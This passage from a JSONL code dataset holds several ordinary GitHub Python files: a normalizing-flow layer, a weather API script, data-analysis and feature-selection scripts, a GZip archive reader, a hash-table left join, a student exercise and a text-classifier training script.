num_pixels\n\n        return x, log_det_jacob\n\n    def backward(self, x):\n        if self.training:\n            mean, var = self.batch_mean, self.batch_var\n        else:\n            mean, var = self.running_mean, self.running_var\n\n        x = (x - self.beta) / torch.exp(self.log_gamma)\n        x = x * torch.sqrt(var) + mean\n\n        num_pixels = np.prod(x.size()) // (x.size(0) * x.size(1))\n        log_det = -self.log_gamma + 0.5 * torch.log(var)\n        log_det_jacob = torch.sum(log_det) * num_pixels\n\n        return x, log_det_jacob\n","repo_name":"haihabi/NormFlowPy","sub_path":"normflowpy/flows/flow_modules/batch_normalization.py","file_name":"batch_normalization.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37871155126","text":"# Task 2\nimport requests\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv('.env')\n\napi = os.getenv('APIkey', None)\n\n\ndef get_weather(url, params):\n    weather = requests.get(url, params=params)\n    temp = weather.json()[\"main\"]\n    temp_now = temp['temp']\n    return temp_now\n\n\nurl = 'https://api.openweathermap.org/data/2.5/weather'\ncity = input('Enter the city name: ')\np = {\n    'appid': api,\n    'q': city,\n    'units': 'metric',\n    'lang': 'ru'\n}\n\nprint(f'The temperature in {city} is {get_weather(url, p)} degrees Celsius')\n","repo_name":"AlexKomogortsev/Parsing","sub_path":"Lesson_1_2.py","file_name":"Lesson_1_2.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10422489273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 14 21:08:26 2017\n\n@author: 5eo1ab\n\"\"\"\n\nimport pandas as pd\nfrom pandas import DataFrame as df\nimport numpy as np\nimport mysql.connector\n\n## Connect Database\ncnx = mysql.connector.connect(\n    user = 'seo',\n    password = '0000',\n    host = '192.168.0.4',\n    database = 'bropy')\nprint(\"Successfully connected.\")\n\n## Load column names\nimport json\nfpath = 'C:/Users/SERVER1/bro.py/dataset_competition/'\ndic_t_cols = json.load(open(fpath+'colnames.json'))\n\n## Load data to DataFrame and set dictionary\ndic_t_df = {}\nfor t, cols in dic_t_cols.items() :\n    cursor = cnx.cursor()\n    query = \"SELECT {} FROM {}\".format(\", \".join(cols), t)\n    cursor.execute(query)\n    dic_t_df[t] = df(cursor.fetchall(), columns=cols)\n    cursor.close()\n    \n#dic_t_df['G_IDX_CLOSE'].head()\n#dic_t_df['MATERIALS'].head()\n\"\"\"\n############################\n## Export to CSV format\n############################\nnationals = ['KR_INDEX', 'US_INDEX', 'CN_INDEX', 'JP_INDEX', 'DE_INDEX']\n\nex_dir = 'C:/Users/SERVER1/bro.py/dataset_competition/EXPORTED_CSV/'\nfor n in nationals :\n    dic_t_df[n].to_csv(dirs+\"{}.csv\".format(n), index=False)\n\"\"\"\n\n\n############################\n## Get pearson cor.\n############################\nfrom scipy.stats import pearsonr\ndef has_missing(ar) :\n    if False in list(ar[:2]==pd.Series([0,0])) :\n        return False\n    return True\ndef get_idx_missing(ar) :\n    if has_missing(ar) is False :\n        return 0\n    return ar[ar>0].index[0]-1\n\nfpath = 'C:/Users/SERVER1/bro.py/dataset_competition/'\ndic_n_idx = json.load(open(fpath+'nationals.json'))\nnationals = list(dic_n_idx.keys())\n\ndic_n_corr = {}\nfor n in nationals :\n    cols = list(dic_t_df[n].columns.values)[1:]\n    corr_li = []\n    tmp_n_df = dic_t_df[n][dic_t_df[n]['TimeLog']>=dic_t_df['G_IDX_CLOSE']['TimeLog'][0]]\n    tmp_n_df = tmp_n_df.reset_index(drop=True)\n    for c0 in cols :\n        tmp_li = [dic_n_idx[n], c0]\n        s_idx = 
get_idx_missing(tmp_n_df[c0])\n corr, p_v = pearsonr(dic_t_df['G_IDX_CLOSE'][dic_n_idx[n]][s_idx:],\n tmp_n_df[c0][s_idx:])\n corr_li.append(tmp_li+[corr, p_v])\n for c0 in cols[:-1] :\n c0_idx = get_idx_missing(dic_t_df[n][c0])\n for c1 in cols[cols.index(c0)+1:] :\n #print(c0,c1)\n tmp_li = [c0, c1]\n if c0_idx > get_idx_missing(dic_t_df[n][c1]):\n s_idx = get_idx_missing(dic_t_df[n][c1])\n else :\n s_idx = c0_idx\n corr, p_v = pearsonr(dic_t_df[n][c0][s_idx:],dic_t_df[n][c1][s_idx:])\n corr_li.append(tmp_li+[corr, p_v])\n dic_n_corr[n] = df(corr_li, columns=['c0', 'c1', 'corr', 'p-value'])\n print(n)\n\n## Export to CSV format\nex_dir = 'C:/Users/SERVER1/bro.py/dataset_competition/EXPORTED_CSV/'\nfor n in nationals :\n dic_n_corr[n].to_csv(ex_dir+\"{}.csv\".format(\"corr_{}\".format(n)), index=False)\n","repo_name":"5eo1ab/competition-index-prediction","sub_path":"dataset_competition/Script_Code/TMP_get_dic_t_df.py","file_name":"TMP_get_dic_t_df.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40623062787","text":"import numpy as np\nfrom makeGraph import featGraph\nfrom training import sampleTraining\n\nclass featureSearch:\n def __init__(self, data):\n self.data = data\n\n def leave_one_out_CV(self, X, Y, features, k, m):\n correct = 0\n current_features = list(features)\n for i in range(m):\n distance = 0\n if k == None:\n distance = 0\n else:\n distance = (X[i, k] - X[:, k])**2\n for feature in current_features:\n distance += (X[i, feature] - X[:, feature])**2\n mini = np.where(distance == np.min(distance[np.nonzero(distance)]))\n if Y[mini[0][0]] == Y[i]:\n correct += 1\n return correct/m\n\n def backward_feature_search(self):\n Y = np.copy(self.data[:, 0]) # Classifications\n X = np.delete(self.data, 0, 1) # Features\n (m, n) = X.shape\n current_set = {s for s in range(n)}\n accuracies = []\n correspond = {}\n for i in range(n, 0, -1):\n print('On level {} of the search tree.'.format(i+1))\n feature_to_subtract = -1\n best = 0\n if i == n:\n accuracy = self.leave_one_out_CV(X, Y, current_set, None, m)\n correspond[frozenset(current_set)] = accuracy\n accuracies.append((-1, accuracy))\n else:\n for k in range(n):\n if k in current_set:\n current_copy = set()\n current_copy = current_set.copy()\n current_copy.remove(k)\n print('--Considering removing feature {}'.format(k+1))\n accuracy = self.leave_one_out_CV(X, Y, current_copy, None, m)\n\n if accuracy > best:\n best = accuracy\n feature_to_subtract = k\n current_set.remove(feature_to_subtract)\n correspond[frozenset(current_set)] = best\n accuracies.append((feature_to_subtract+1, best))\n print('Removed feature {} on level {}'.format(feature_to_subtract+1, i+1))\n\n default_rate = np.sum(Y == 1)\n if default_rate > m - default_rate:\n correspond[frozenset()] = default_rate/m\n accuracies.append((0, default_rate / m))\n else:\n correspond[frozenset()] = (m - default_rate) / m\n accuracies.append((0, (m - default_rate) / m))\n return accuracies, correspond\n\n def forward_feature_search(self):\n Y = np.copy(self.data[:, 0]) # Classifications\n X = np.delete(self.data, 0, 1) # Features\n #Y = np.array([1, 0, 1, 1, 0, 1, 0, 1, 0, 0])\n #X = np.array([[2.7, 5.5], [8, 9.1], [0.9, 4.7], [1.1, 3.2], [5.4, 8.5], [2.9, 1.9], [6.1, 6.6], [0.5, 1], [8.3, 6.6], [8.1, 4.7]])\n current_set = set()\n (m, n) = X.shape\n accuracies = []\n correspond = {}\n default_rate = np.sum(Y == 1)\n if default_rate > m - default_rate:\n 
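# no-feature baseline: the accuracy of always predicting the majority class (label 1 here)\n            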
correspond[frozenset()] = default_rate / m\n accuracies.append((0, default_rate/m))\n else:\n correspond[frozenset()] = (m - default_rate) / m\n accuracies.append((0, (m-default_rate)/m))\n print('When no elements exist in the set, the accuracy is: {:.1f}%\\n\\n'.format(accuracies[0][1]*100))\n print('Beginning search. . .\\n')\n for i in range(n):\n feature_to_add = -1\n best = 0\n for k in range(n):\n if k not in current_set:\n accuracy = self.leave_one_out_CV(X, Y, current_set, k, m)\n if len(current_set) == 0:\n print('\\t\\tUsing feature(s) {{{}}}: accuracy is {:.1f}%'.format(k+1, accuracy*100))\n else:\n print('\\t\\tUsing feature(s) {} and {{{}}} : accuracy is {:.1f}%'.format(current_set, k+1, accuracy*100))\n if accuracy > best:\n best = accuracy\n feature_to_add = k\n current_set.add(feature_to_add)\n correspond[frozenset(current_set)] = best\n accuracies.append((feature_to_add+1, best))\n print('\\nFeature(s) {} was best, with accuracy {:.1f}%\\n'.format({s+1 for s in current_set}, best*100))\n sorted_corr = sorted(correspond.items(), key=lambda x: x[1], reverse=True)\n best_set, best_acc = sorted_corr[0]\n print('The best feature subset is {}, which has an accuracy of {:.1f}%'.format({s+1 for s in best_set}, best_acc*100))\n return accuracies, correspond, Y, X\n\n\nif __name__ == '__main__':\n print('Welcome to Chris\\' feature selection!')\n filename = input('Enter file name:')\n print('Which algorithm would you like to run? \\n')\n print('1) Forward Search')\n print('2) Backward Search')\n print('3) Chris\\' Special Search')\n choice = input()\n data = np.genfromtxt(filename)\n (m, n) = data.shape\n removal_size = int(m/10)\n search = featureSearch(data)\n if choice == '1':\n print('Starting forward feature search. . .')\n print('\\n\\n This dataset has {} features and {} examples.'.format(n, m))\n faccuracies, fcorr, Y, X = search.forward_feature_search()\n print('Forward feature search finished.')\n elif choice == '2':\n print('Starting backward feature search. . .')\n baccuracies, bcorr = search.backward_feature_search()\n print('Backward feature search finished.')\n elif choice == '3':\n i = 1\n while len(data) > 0:\n search = featureSearch(data)\n faccuracies, fcorr, Y, X = search.forward_feature_search()\n baccuracies, bcorr = search.backward_feature_search()\n new_data = sampleTraining(data, m, removal_size)\n data = new_data.remove_some_data()\n (m, n) = data.shape","repo_name":"ChairMane/Feature-Search","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71621642027","text":"\"\"\"\nThis package provides an advanced interface for accessing multi-member GZip files (analogous to TarFile etc.)\n\nWith respect to the built-in `gzip.GZipFile` class in Python, this interface offers:\n\n- Multi-member support (i.e. multiple ``.gz`` files concatenated in one, which is allowed by the standard)\n- Full extraction of all available metadata (comments, file name, extra field, flags etc)\n\nThe main class of interest is `GZFile`. 
{"seq_id":"71621642027","text":"\"\"\"\nThis package provides an advanced interface for accessing multi-member GZip files (analogous to TarFile etc.)\n\nWith respect to the built-in `gzip.GZipFile` class in Python, this interface offers:\n\n- Multi-member support (i.e. multiple ``.gz`` files concatenated in one, which is allowed by the standard)\n- Full extraction of all available metadata (comments, file name, extra field, flags etc)\n\nThe main class of interest is `GZFile`. We can open a gzip file like so::\n\n    gz_file = GZFile('path/to/file.gz')\n\nand obtain all the entries as `GZEntry` objects::\n\n    for entry in gz_file:\n        print(entry)\n\nto read or extract an entry's data, we can use::\n\n    with gz_file.open(gz_file.entries[1]) as f:\n        f.read()\n\nMore details are available in the `GZFile` and `GZEntry` docs.\n\"\"\"\n\nimport zlib\nimport os\n\nfrom dataclasses import dataclass\nfrom typing import ContextManager, BinaryIO, AnyStr, Union, Optional, Tuple, TypeVar, Type\nfrom os import PathLike\nfrom io import IOBase, BufferedIOBase\nfrom enum import IntFlag, IntEnum\nfrom gzip import GzipFile\n\nfrom atmfjstc.lib.binary_utils.BinaryReader import BinaryReader, BinaryReaderFormatError\nfrom atmfjstc.lib.file_utils.fileobj import FileObjSliceReader\n\n\nGZIP_MAGIC = b'\\x1f\\x8b'\n\n\nclass GZFile(ContextManager['GZFile']):\n    \"\"\"\n    This class provides access to a GZip archive stored in a file or file object.\n\n    A `GZFile` scans the input file as soon as it is constructed. Afterwards, data about the archive is available in\n    the following attributes:\n\n    - `entries`: A tuple of `GZEntry` objects describing each entry in the archive, in the order they occur in the\n      file. Most practical GZip archives have only one entry, but more are allowed by the standard.\n    - `trailing_zeros`: The number of trailing 0 bytes found after the entries, which is apparently allowed in\n      practice.\n\n    The content of an entry can be opened for reading or extraction by passing it to the `open` method.\n\n    A `GZFile` can be either opened and closed manually::\n\n        gzf = GZFile(\"file.gz\")\n        print(gzf.entries)\n        gzf.close()\n\n    or used as a context manager::\n\n        with GZFile(\"file.gz\") as gzf:\n            print(gzf.entries)\n\n    This class does not offer functionality for writing GZip archives.\n    \"\"\"\n\n    _fileobj: BinaryIO\n    _fileobj_owned: bool = False\n\n    _entries: Tuple['GZEntry'] = ()\n    _trailing_zeros: int = 0\n\n    def __init__(self, path_or_fileobj: Union[PathLike, AnyStr, BinaryIO]):\n        \"\"\"\n        Opens a GZip archive for reading.\n\n        Args:\n            path_or_fileobj: Either a filename, or an open file object containing the archive.\n\n        Raises:\n            NotAGZipFileError: If the data does not match the structure of a GZip file\n            GZipFileCorruptError: If the file seemed to be a GZip archive, but its structure is corrupt or incorrect\n\n        There are several caveats if a file object is passed:\n\n        - The archive will be read from the current position in the fileobj, to the end. It is not automatically\n          rewound!\n        - The data in the file object should not be changed during the lifetime of the `GZFile`. It only reads the\n          archive once and does not expect any changes.\n        - The file object should be kept open for the lifetime of the `GZFile` if we need to read the contents of the\n          entries.\n        - The `GZFile` will not close the file object itself when the context ends.\n\n        Finally, note that due to the limits of the GZip format, a file must be parsed in its entirety, including the\n        compressed data, in order to locate all members and validate them. 
Opening very large archives will be expensive\n even if all you want to do is read the metadata.\n \"\"\"\n\n if isinstance(path_or_fileobj, IOBase):\n if not path_or_fileobj.seekable():\n raise ValueError(\"File object must be seekable\")\n\n self._fileobj = path_or_fileobj\n else:\n self._fileobj = open(path_or_fileobj, 'rb')\n self._fileobj_owned = True\n\n self._read_archive()\n\n @property\n def entries(self) -> Tuple['GZEntry']:\n \"\"\"\n Metadata about the entries in the archive, in the order they appear.\n \"\"\"\n return self._entries\n\n @property\n def trailing_zeros(self) -> int:\n \"\"\"\n The number of trailing zero bytes after the last entry in the archive.\n \"\"\"\n return self._trailing_zeros\n\n def open(self, entry: 'GZEntry') -> BufferedIOBase:\n \"\"\"\n Opens the content of an entry for perusal and extraction.\n\n The GZip file must still be open for this to work.\n\n Args:\n entry: A GZIP file entry, as obtained from the `entries` attribute.\n\n Returns:\n An open file object, in binary mode. If you need text access, wrap it in a `TextIOWrapper`.\n\n Warning: do not manipulate entry file objects from multiple threads simultaneously.\n \"\"\"\n\n if self._fileobj.closed:\n raise ValueError(\"Cannot read entries because the underlying file object has been closed\")\n\n if entry not in self._entries:\n raise ValueError(\"Entry does not belong to this GZip file!\")\n\n return GzipFile(\n fileobj=FileObjSliceReader(self._fileobj, entry.entry_start_offset, entry.total_entry_size),\n mode='rb',\n filename=entry.original_filename or entry.raw_original_filename,\n )\n\n def close(self):\n \"\"\"\n Closes the underlying file object.\n\n Once the file is closed, you can still read the metadata for the entries, but you won't be able to open their\n contents.\n\n Note that this method closes the file object regardless of whether it was created by `GZFile` or received from\n elsewhere!\n \"\"\"\n\n if self._fileobj is not None:\n self._fileobj.close()\n\n def __enter__(self) -> 'GZFile':\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if (not self._fileobj_owned) or (self._fileobj is None) or self._fileobj.closed:\n return\n\n self._fileobj.close()\n\n def _read_archive(self):\n reader = BinaryReader(self._fileobj, big_endian=False)\n\n if not reader.peek_magic(GZIP_MAGIC):\n raise NotAGZipFileError(reader.name())\n\n entries = []\n\n while reader.bytes_remaining() > 0:\n if reader.peek(1) == b'\\x00':\n while reader.bytes_remaining() > 0:\n data = reader.read_at_most(1000000)\n if data.count(b'\\x00') < len(data):\n raise GZipFileCorruptError(reader.name()) from \\\n BadGZipFileError(\"There is data after the entries, but it is not all zeroes\")\n\n self._trailing_zeros += len(data)\n\n break\n\n entries.append(GZEntry.read_from_binary(reader))\n\n self._entries = tuple(entries)\n\n\nclass GZEntryFlags(IntFlag):\n IS_TEXT = 1\n HAS_HEADER_CRC = 2\n HAS_EXTRA = 4\n HAS_NAME = 8\n HAS_COMMENT = 16\n\n RESERVED_MASK = 224\n\n\nclass GZCompressionMethod(IntEnum):\n DEFLATE = 8\n\n\nclass GZDeflateCompressionFlags(IntFlag):\n MAXIMUM = 2\n FAST = 4\n\n\nclass GZHostOS(IntEnum):\n FAT = 0\n AMIGA = 1\n VMS = 2\n UNIX = 3\n VM_CMS = 4\n ATARI_TOS = 5\n HPFS = 6\n MACINTOSH = 7\n Z_SYSTEM = 8\n CPM = 9\n TOPS20 = 10\n NTFS = 11\n QDOS = 12\n ACORN_RISCOS = 13\n UNKNOWN = 255\n\n\n@dataclass(frozen=True)\nclass GZEntry:\n \"\"\"\n An object containing the full metadata for an entry in a GZip archive.\n\n Note that objects of this type are just inert data containers. 
They can be copied from their originating `GZFile`\n    object and are unaffected by its closure.\n\n    Attributes:\n        flags: A `GZEntryFlags` enum containing the flags set for this entry. The only one of potential use is\n            `IS_TEXT`, which marks whether the content is likely a text file. The other flags just control parsing and\n            are automatically used by the entry decoder.\n        compression_method: A `GZCompressionMethod` enum specifying the compression method used for the entry, or\n            an int, if it is not recognized. In practice, virtually all existing GZip files use DEFLATE.\n        compression_flags: A compression-method dependent enum specifying flags specific to that compression method,\n            or an int, if the compression method is unrecognized. In practice, this will nearly always be a\n            `GZDeflateCompressionFlags` indicating whether fast vs maximum compression was used.\n        compressed_length: The size of the compressed data, in bytes.\n        uncompressed_length: The size of the uncompressed data, in bytes\n        uncompressed_crc32: The CRC-32 hash of the uncompressed data\n        entry_start_offset: The offset, in bytes, at which this entry occurs in the containing GZip file\n        data_start_offset: The offset, in bytes, at which the data for this entry occurs in the containing GZip file\n        host_os: [Optional] A `GZHostOS` enum specifying the operating system under which archival was performed, or\n            an int if it is unrecognized.\n        unix_timestamp: [Optional] A UNIX timestamp for the entry, usually representing the file's last modification time.\n        raw_extra_field: [Optional] A bytes object representing the content of the EXTRA field for this entry. This\n            seems to have never been widely used.\n        original_filename: [Optional] The original filename for this entry, as a string. It is only a suggestion, as in\n            practice GZip archives are single-file and the caller can just strip the ``.gz`` extension from the archive.\n        raw_original_filename: [Optional] The original filename, as a byte string, if for some reason it could not be\n            interpreted as valid LATIN-1 characters.\n        comment: [Optional] A comment for this entry, as a string.\n        raw_comment: [Optional] The entry comment, as a byte string, if for some reason it could not be interpreted as\n            valid LATIN-1 characters.\n    \"\"\"\n\n    flags: GZEntryFlags\n\n    compression_method: Union[GZCompressionMethod, int]\n    compression_flags: Union[GZDeflateCompressionFlags, int]\n    compressed_length: int\n    uncompressed_length: int\n    uncompressed_crc32: int\n\n    entry_start_offset: int\n    data_start_offset: int\n\n    host_os: Optional[Union[GZHostOS, int]] = None\n\n    unix_timestamp: Optional[int] = None\n\n    raw_extra_field: Optional[bytes] = None\n\n    original_filename: Optional[str] = None\n    raw_original_filename: Optional[bytes] = None\n\n    comment: Optional[str] = None\n    raw_comment: Optional[bytes] = None\n\n    @property\n    def total_entry_size(self) -> int:\n        return self.data_start_offset - self.entry_start_offset + self.compressed_length + 8\n\n    @staticmethod\n    def read_from_binary(reader: BinaryReader) -> 'GZEntry':\n        entry_start_offset = reader.tell()\n\n        raw_extra_field = None\n        raw_filename = None\n        raw_comment = None\n\n        try:\n            reader.expect_magic(GZIP_MAGIC, 'GZip magic')\n            compression_method, flags, timestamp, compress_flags, host_os = \\\n                reader.read_struct('BBIBB', 'GZip entry header')\n\n            if compression_method != GZCompressionMethod.DEFLATE:\n                raise NotImplementedError(\n                    f\"Found a GZ entry with compression method {compression_method}. Only Deflate entries are \"\n                    f\"supported (don't know how to parse past other types)\"\n                )\n\n            if flags & GZEntryFlags.RESERVED_MASK:\n                raise NotImplementedError(\n                    f\"Found a GZ entry with flags: {flags:08b}. As per the spec, cannot parse the entry when reserved \"\n                    f\"bits are set, as they may indicate the presence of extra members we don't know how to parse.\"\n                )\n\n            if flags & GZEntryFlags.HAS_EXTRA:\n                raw_extra_field = reader.read_length_prefixed_bytes('extra field', length_bytes=2)\n            if flags & GZEntryFlags.HAS_NAME:\n                raw_filename = reader.read_null_terminated_bytes('entry original name')\n            if flags & GZEntryFlags.HAS_COMMENT:\n                raw_comment = reader.read_null_terminated_bytes('entry comment')\n            if flags & GZEntryFlags.HAS_HEADER_CRC:\n                reader.skip_bytes(2)  # Can't be arsed to check the header CRC, if there are errors we'll know soon\n\n            data_start_offset = reader.tell()\n            uncompressed_length = 0\n            crc32 = zlib.crc32(b'')\n\n            BUF_SIZE = 64000000\n\n            decompressor = zlib.decompressobj(-zlib.MAX_WBITS)\n\n            compressed_data = b''\n\n            while not decompressor.eof:\n                if len(compressed_data) == 0:\n                    compressed_data = reader.read_at_most(BUF_SIZE)\n                    if len(compressed_data) == 0:\n                        raise BadGZipFileError(\"File ends in the middle of a compressed block\")\n\n                decompressed_data = decompressor.decompress(compressed_data, BUF_SIZE)\n\n                uncompressed_length += len(decompressed_data)\n                crc32 = zlib.crc32(decompressed_data, crc32)\n\n                compressed_data = decompressor.unconsumed_tail\n\n            reader.seek(-len(decompressor.unused_data), os.SEEK_CUR)\n\n            declared_crc32, declared_size = reader.read_struct('II', 'GZip entry footer')\n\n            crc32 &= 0xffffffff\n            if crc32 != declared_crc32:\n                raise BadGZipFileError(\n                    f\"Entry CRC failed (declared: 0x{declared_crc32:08x}, actual: 0x{crc32:08x})\"\n                )\n\n            if declared_size != uncompressed_length & 0xffffffff:\n                raise BadGZipFileError(\n                    f\"Entry size does not match the declared size in the lowest 32 bits (declared: {declared_size}, \"\n                    f\"actual: {uncompressed_length})\"\n                )\n        except BadGZipFileError as e:\n            raise GZipFileCorruptError(reader.name()) from e\n        except BinaryReaderFormatError as e:\n            raise GZipFileCorruptError(reader.name()) from e\n\n        original_filename, raw_filename = _try_decode(raw_filename)\n        comment, raw_comment = _try_decode(raw_comment)\n\n        if compression_method == GZCompressionMethod.DEFLATE:\n            compress_flags = GZDeflateCompressionFlags(compress_flags)\n\n        return GZEntry(\n            flags=GZEntryFlags(flags),\n            compression_method=_as_enum(compression_method, GZCompressionMethod),\n            compression_flags=compress_flags,\n            compressed_length=reader.tell() - data_start_offset - 8,\n            uncompressed_length=uncompressed_length,\n            uncompressed_crc32=declared_crc32,\n            entry_start_offset=entry_start_offset,\n            data_start_offset=data_start_offset,\n            host_os=_as_enum(host_os, GZHostOS) if host_os != 255 else None,\n            unix_timestamp=timestamp if timestamp != 0 else None,\n            raw_extra_field=raw_extra_field,\n            original_filename=original_filename,\n            raw_original_filename=raw_filename,\n            comment=comment,\n            raw_comment=raw_comment,\n        )\n\n\ndef _try_decode(raw_str: Optional[bytes]) -> Tuple[Optional[str], Optional[bytes]]:\n    if raw_str is None:\n        return None, None\n\n    try:\n        return raw_str.decode('latin-1'), None\n    except Exception:\n        return None, raw_str\n\n\nT = TypeVar('T')\n\n\ndef _as_enum(raw_value: int, enum: Type[T]) -> Union[T, int]:\n    try:\n        return enum(raw_value)\n    except Exception:\n        return raw_value\n\n\nclass BadGZipFileError(Exception):\n    pass\n\n\nclass NotAGZipFileError(BadGZipFileError):\n    def __init__(self, file_name: Optional[str]):\n        quoted_name = f\" '{file_name}'\" if file_name is not None else ''\n        super().__init__(f\"File{quoted_name} is not a GZip file\")\n\n\nclass GZipFileCorruptError(BadGZipFileError):\n    def __init__(self, file_name: Optional[str]):\n        quoted_name = f\" '{file_name}'\" if file_name is not None else ''\n        super().__init__(f\"GZip file{quoted_name} is corrupt or malformed\")\n\n","repo_name":"goc9000/python-library","sub_path":"gz-file/src/atmfjstc/lib/gz_file/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
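A short usage sketch grounded in the docstrings of the record above (illustrative only; 'multi.gz' is a hypothetical path): enumerate every member of a possibly multi-member archive and read each one's payload.

from atmfjstc.lib.gz_file import GZFile

with GZFile('multi.gz') as gzf:
    print('trailing zero bytes:', gzf.trailing_zeros)
    for entry in gzf.entries:
        # GZEntry is an inert metadata container; pass it back to open() to
        # get a readable binary file object for the member's contents
        print(entry.original_filename, entry.uncompressed_length)
        with gzf.open(entry) as member:
            data = member.read()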
{"seq_id":"28439049412","text":"from functools import reduce\nfrom operator import add\n\nclass Node:\n    def __init__(self, value):\n        self.next=None\n        self.value=value\n\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n\n    def insert (self, value):\n        new_node = Node(value)\n        new_node.next = self.head\n        self.head = new_node\n\n\nclass HashTable:\n    def __init__(self,size=1024):\n        self.__size=size\n        self.__buckets=[None] *size\n        self.keys = []\n        self.repeat=[]\n    \n    \n    def __hash(self,key):\n        key=str(key)\n        return reduce(add, [ord(str(char)) for char in key]) * 283 % self.__size\n\n    \n    def set(self,key,value):\n        index = self.__hash(key)\n        if self.__buckets[index] is None:\n            ll = LinkedList()\n            self.__buckets[index] = ll\n        \n        self.__buckets[index].insert([key,value])\n        self.keys.append(key)\n        \n\n    def get(self,key):\n        index=self.__hash(key)\n        bucket = self.__buckets[index]\n        if bucket is not None : \n            curr = bucket.head\n            while curr :\n                if curr.value[0] == key :\n                    return curr.value[1]\n                curr = curr.next \n        return None \n    \n\n    def has(self, key):\n        if self.get(key):\n            return True\n        return False\n\n    # NOTE: the stored keys are exposed through the ``keys`` list attribute set in\n    # __init__; an instance method named ``keys`` would be shadowed by that\n    # attribute and could never be called, so none is defined here.\n    \ndef left_join(ht1,ht2):\n    \"\"\"\n    Perform a left join operation on two hash tables.\n\n    Parameters:\n    ht1 (HashTable): The first hash table.\n    ht2 (HashTable): The second hash table.\n\n    Returns:\n    list: A list of lists containing the left join result.\n          Each inner list contains [key, value from ht1, value from ht2 or 'Null'].\n\n    \"\"\"\n    keys1=ht1.keys\n    keys2=ht2.keys\n    baselist=[]\n    for i in keys1:\n        new=[i]\n        new.append(ht1.get(i))\n        if i in keys2:\n            new.append(ht2.get(i))\n        else:\n            new.append('Null')\n        baselist.append(new)\n    return baselist\n\n","repo_name":"aseelbdoor/data-structures-and-algorithms","sub_path":"python/hashmap_left_join/hashmap_left_join.py","file_name":"hashmap_left_join.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
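A quick usage sketch for left_join (hypothetical keys and values, relying only on the HashTable defined in the record above):

ht1 = HashTable()
ht2 = HashTable()
for k, v in [('fond', 'enamored'), ('wrath', 'anger'), ('flow', 'jam')]:
    ht1.set(k, v)
ht2.set('fond', 'averse')
ht2.set('wrath', 'delight')

# keys missing from ht2 get the literal string 'Null' in the third column
print(left_join(ht1, ht2))
# [['fond', 'enamored', 'averse'], ['wrath', 'anger', 'delight'], ['flow', 'jam', 'Null']]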
{"seq_id":"27022137580","text":"\n\n\"\"\"\nThis program imports a class from another file and uses it.\nThe program creates three objects of that class, each with three arguments.\nIt then uses methods from the class to print the objects.\nFinally it uses another method to add km to the odometer reading and\nprints it out.\n\"\"\"\n#exercise 5\nfrom motorsykkel import Motorsykkel #imports the class from the file\n\ndef hovedprogram(): #Creates a main program\n    #Exercise 6\n    ms1 = Motorsykkel(\"BMW\", \"BT86374\", \"30000\") #creates an object of the Motorsykkel class\n    ms2 = Motorsykkel(\"Honda\", \"PC87201\", \"45630\") #creates an object of the Motorsykkel class\n    ms3 = Motorsykkel(\"Volvo\", \"DP36021\", \"29800\") #creates an object of the Motorsykkel class\n\n    ms1.skrivUt() #Calls the skrivUt method from the class\n    ms2.skrivUt() #Calls the skrivUt method from the class\n    ms3.skrivUt() #Calls the skrivUt method from the class\n\n    #Exercise 7\n    ms3.kjor(10) #Calls the kjor method, which adds 10 (the argument) to the odometer reading\n    assert ms3.hentKilometerstand() == 29810 #Checks that the result is what I expect\n    print(ms3.hentKilometerstand()) #Prints the new odometer reading\n#Exercise 8 haha\nhovedprogram() #calls the main program\n","repo_name":"AdaSofieAmlie/IN1000","sub_path":"Oblig 6/testMotorsykkel.py","file_name":"testMotorsykkel.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"30396548969","text":"import pandas as pd\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nimport pickle\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndf = pd.read_csv('D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\tweets_clean.csv')\r\n\r\n# drop rows with missing labels before selecting the training columns\r\ncol = ['label', 'data_clean']\r\ndf = df[pd.notna(df['label'])]\r\ndf4 = df[col]\r\ndf4.columns = ['label', 'data_clean']\r\n\r\ndef train_model():\r\n\r\n    X_train,X_test, y_train,y_test = train_test_split(df4['data_clean'], df4['label'], random_state = 0)\r\n\r\n    count_vect = CountVectorizer()\r\n    tfidf_transformer = TfidfTransformer()\r\n\r\n    X_train_counts = count_vect.fit_transform(X_train)\r\n    X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)\r\n\r\n    model = LinearSVC().fit(X_train_tfidf, y_train)\r\n\r\n    vec_file = 'D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\vectorizer.pickle'\r\n    pickle.dump(count_vect, open(vec_file, 'wb'))\r\n\r\n    # Save the fitted tf-idf transformer as well: predictions must apply the\r\n    # same weighting used in training ('tfidf.pickle' is an assumed file name)\r\n    tfidf_file = 'D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\tfidf.pickle'\r\n    pickle.dump(tfidf_transformer, open(tfidf_file, 'wb'))\r\n\r\n    # Save the model\r\n    mod_file = 'D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\classification.joblib'\r\n    